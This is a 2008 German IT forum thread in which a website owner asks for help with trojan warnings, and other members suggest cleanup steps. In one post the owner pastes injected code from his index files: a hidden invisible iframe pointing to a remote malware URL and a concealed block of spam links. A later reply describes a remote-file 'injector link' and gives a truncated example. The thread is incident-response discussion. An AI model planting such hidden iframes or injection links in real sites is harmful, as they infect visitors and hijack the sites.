Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Probleme mit Trojaner Warnungen auf meinen Webseiten

Mitglied: Pussemuckelpeter

Pussemuckelpeter (Level 1) - Jetzt verbinden

13.02.2008, aktualisiert 07.08.2008, 10220 Aufrufe, 6 Kommentare

Hallo zusammen

Ich habe da glaube ich ein ernstes Problem

Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.

Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e

Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...


Laut 1&1 , meinem Webhoster können die nix finden.


Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.

Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.


Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...

Gruß
Mitglied: kaiand1
13.02.2008 um 20:34 Uhr
du scheinst da ein/mehere Javascripte zu haben wo sich der Trojaner befindet bzw ein Script? was da nicht hingehört
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
Bitte warten ..
Mitglied: wiesi200
13.02.2008 um 21:05 Uhr
Gehört zwar nicht hier her aber, tolle Seite. Hab’s gleich unseren Ausbildungsmeister geschickt.
Das hat wirklich Respekt verdient.
Bitte warten ..
Mitglied: filippg
13.02.2008 um 22:11 Uhr
Hallo,

hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.

Gruß

Filipp
Bitte warten ..
Mitglied: LordGurke
13.02.2008 um 22:22 Uhr
Hat vielleicht jemand deine FTP-Daten geknackt?
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Bitte warten ..
Mitglied: Pussemuckelpeter
14.02.2008 um 07:10 Uhr
Hallo, vielen Dank für Eure / Ihre Antworten.

Ich habe das hier in den beiden index Dateien gefunden:

<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">&nbsp;
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none"><a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/in ..." viagra</a>
<a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/ma ..." levitra</a><a href="http://lothlorian.org.ua;>buy" viagra, buy xenical, viagra,buy levitra, porno</a><a href="http://www.ptshome.com/pressreleases/lego/map.html;>Lego" toys</a>
<a href="http://www.ptshome.com/pressreleases/lego/index.html;>Lego</ ..."
</div>


Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.

Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.

Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...

Gruß
Bitte warten ..
Mitglied: 0x0badc0de
07.08.2008 um 23:47 Uhr
Hallo...

!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.

mfg
0x0badc0de
Bitte warten ..
Ähnliche Inhalte
SAN, NAS, DAS

Trojan Verschlüsselung iSCSI Laufwerke dauerhaft trennen

gelöst Frage von dennz2018SAN, NAS, DAS2 Kommentare

Ich weiss, so eine Frage gab es sicherlich schon einmal. Aber ich konnte nichts genau hier zu finden. Im ...

Visual Studio

VB.Net Warnung unterbinden

gelöst Frage von emeriksVisual Studio3 Kommentare

Hi, wenn ich im Visual Studio (VB.Net) u.g. Code verwende, dann meckert die IDE immer rum, dass der Code ...

Linux

Bacula Backup Warnung

gelöst Frage von Hector-UserLinux

Das Backup läuft erfolgreich durch mit einer Warnung: Kennt die Fehlermeldung jemand ? Im Internet findet man Sie oft ...

Exchange Server

MSExchange Assistants Warnung ID 9045

Frage von MazenauerExchange Server1 Kommentar

Guten Tag zusammen, Ich habe nun zum dritten Mal seit ca. drei Tagen die folgende Warnung im Eventlog eines ...

Neue Wissensbeiträge
Exchange Server

1und1 IONOS: Probleme beim Mailversand mit Exchange

Information von reksierp vor 1 StundeExchange Server

Hallo, seit Do, 17.1.19 etwa Mittags nimmt 1und1 IONOS keine Mails mehr über den Standard-Port SMTP 25 an. Nachdem ...

LAN, WAN, Wireless

Cisco Mikrotik VPN Standort Vernetzung mit dynamischem Routing

Anleitung von aqui vor 14 StundenLAN, WAN, Wireless

1. Allgemeine Einleitung Das nachfolgende Tutorial ist eine Fortführung der hier bei Administrator.de schon bestehenden VPN Tutorials und beschreibt ...

Windows Mobile

Support für Windows Mobile endet im Dezember 2019

Information von transocean vor 2 TagenWindows Mobile

Moin, Microsoft empfiehlt als Alternative den Umstieg auf iOS oder Android, wie man hier lesen kann. Gruß Uwe

Internet

Kommentar: Bundesregierung erwägt Ausschluss von Huawei im 5G-Netz - Unsere Presse wird immer sensationsgieriger

Information von Frank vor 3 TagenInternet6 Kommentare

Hier mal wieder ein schönes Beispiel für fehlgeleiteten Journalismus und Politik zugleich. Da werden aus Gerüchten plötzlich Fakten, da ...

Heiß diskutierte Inhalte
LAN, WAN, Wireless
Temporäre WLAN Verbindung für AD-Login
Frage von Christian.WidauerLAN, WAN, Wireless17 Kommentare

Hallo zusammen, ich weiß leider nicht unter welchem Begriff ich dafür suchen muss, daher habe ich bisher leider nichts ...

LAN, WAN, Wireless
Bekannte Drosselungen bei Providern ?
Frage von HenereLAN, WAN, Wireless15 Kommentare

Servus zusammen, in bereits angefangen, aber ich hoffe dass der Beitrag hier mehr Informationen bringt. Sind Portdrosselungen bzw gezielte ...

Netzwerkmanagement
Reverse Proxy für TCP und UDP Anfragen
gelöst Frage von flxklsNetzwerkmanagement14 Kommentare

Hallo zusammen, ich besitze einen Rootserver, der nur eine öffentliche IP besitzt und auf dem mehrere VMs laufen. Da ...

Windows Server
MSSQL Backup in Form von .sql einspielen
Frage von janosch12Windows Server14 Kommentare

Guten Morgen, wir verwenden das Tool SQLandFTPBackup ( ) zum sichern einiger MSSQL Datenbanken. Nun sichert das Toll die ...